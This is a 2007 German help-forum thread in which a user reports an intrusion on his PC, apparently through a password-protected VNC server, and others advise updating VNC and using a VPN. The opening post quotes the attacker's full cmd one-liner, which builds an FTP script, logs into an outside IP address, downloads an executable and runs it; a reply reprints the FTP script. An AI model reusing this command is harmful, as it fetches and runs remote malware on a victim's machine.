Sicherheitslücke ???

Dieses Thema Sicherheitslücke ??? im Forum "Sonstiges rund ums Internet" wurde erstellt von schydhei, 4. Nov. 2007.

Thema: Sicherheitslücke ??? Hallo, ich habe meinen Rechner neu aufgesetzt. Habe Antivir als Virenscanner, Spybot für die Registry und eine...

  1. Hallo,
    ich habe meinen Rechner neu aufgesetzt. Habe Antivir als Virenscanner, Spybot für die Registry und eine Firewall (extern). Unter anderem habe ich VNC installiert, damit ich ich von draußen auf mein Rechner kann. Das Ganze natürlich Passwort geschützt. Die Anwendung habe ich auch in der Firewall konfiguriert.
    Über Nacht habe ich meinen Rechner laufen lassen. Und siehe da irgendwas hat mein Ausführen geöffnet. Das ganze mehrfach mit folgendem Inhalt.
    cmd /c echo open 90.128.78.22 3992 >> i &echo user mmokgp mmokgp >> i &echo get msoft42714.exe >> i &echo quit >> i &ftp -nv -s:i &msoft42714.exe &exit
    Auch in der Ereignisanzeige konnte ich folgende einträge von VNC finden....
    Connections: closed: 90.128.78.22::7896 (read: Connection reset by peer (10054)) oder Connections: accepted: 90.128.78.22::7896

    Wer hat da was gemacht??? Fühle mich im Moment sehr ausspioniert !!!!

    Hat jemand eine Ahnung ????

    Gruß
    Heiko
     
  2. Als erstes würde ich mal nachsehen, ob ich eine msoft42714.exe auf meinem Rechner finde.
    Wer immer auf Deinem Rechner war, hat eine Datei mit folgendem Inhalt angelegt:
    Code:
    open 90.128.78.22 3992 
    user mmokgp mmokgp 
    get msoft42714.exe 
    quit
    Und diese per FTP ausführen lassen.
    Die Datei i sollte unter C:\Dokumente und Einstellungen\Benutzername\ liegen. Diese wäre auch zu löschen.
    Ansonsten würde ich sagen, konnte er alles mit Deinem Rechner machen, was er wollte.
    IMHO wirst Du es nie erfahren.

    Eddie
     
  3. :'( Wie verdammt hat er das geschafft???? :tickedoff:

    Für was habe ich denn eine Firewall. Das einzige was ich mir vorstelölen kann, wäre der Weg über VNC. Der ist aber Passwortgeschützt.

    Verdammt........

    Gruß
    Heiko
     
  4. Hier hast Du die Antwort, wie er das geschafft hat.
    VNC ohne VPN zu nutzen ist schon sehr fahrlässig.

    Eddie
     
  5. Das würde ja bedeuten, das er das Passwort geknackkt hat, oder gibt es andere Möglichkeiten über VNC reinzukommen.

    Gruß
     
  6. Möglich ist Vieles.
    Informier Dich doch mal beim Anbieter Deiner VNC Lösung über Updates.
    Vielleicht war auch einfach das Passwort zu schlecht gewählt.

    Eddie
     
  7. OK, ich bin ja lernfähig... Daraus habe ich bestimmt gelernt. Warscheinlich werde ich nicht herrausfinden wie er ohne Passwort auf mein Rechner zugreifen konnte.

    Über VPN einen Tunnel aufzubauen wäre mit Sicherheit sicherer. Das bedeutet aber doch , das ich von jedem Rechner aus von dem ich auf den Rechner zuhause zugreifen möchte eine Software installieren muss. Also das müsste ich mir mal genauer erklären lassen. Hat da jemand mal Zeit und mir erklären könnte wie ich sowas mit welcher Software aufsetze? :-\

    Gruß
    Heiko[br][br]Erstellt am: 04.11.07 um 19:02:26[hr][br]
    Das Passwort besteht aus Groß und Kleinschreibung, verbunden mit einer Zahl und hat über 10Zeichen. Bei Ebay z.B. wir das Passwort als sehr Sicher gekennzeichnet.

    Gruß
    Heiko
     
  8. :tickedoff: :danke1: :T

    Toll genau die Version habe ich...... Man kann sich einfach auf nichts mehr verlassen.....

    Prima,den Tip werde ich direkt verwenden......

    Update erfolgt sofort, weiterhin werde ich das mit dem VPN Tunnel in Angriff nehmen.....

    Gruß
    und danke.....
     
Die Seite wird geladen...

Sicherheitslücke ??? - Ähnliche Themen

Forum Datum
Sicherheitslücke bei Linux Systeme Linux & Andere 26. Sep. 2014
Firefox schließt Sicherheitslücke Windows 7 Forum 23. März 2010
Sicherheitslücke Firefox 3.5 Web-Browser 15. Juli 2009
VNC Sicherheitslücke? application/octet-stream Windows XP Forum 25. Nov. 2006
VNC 4.1 Sicherheitslücke: Unangenehmer Besuch Software: Empfehlungen, Gesuche & Problemlösungen 7. Nov. 2006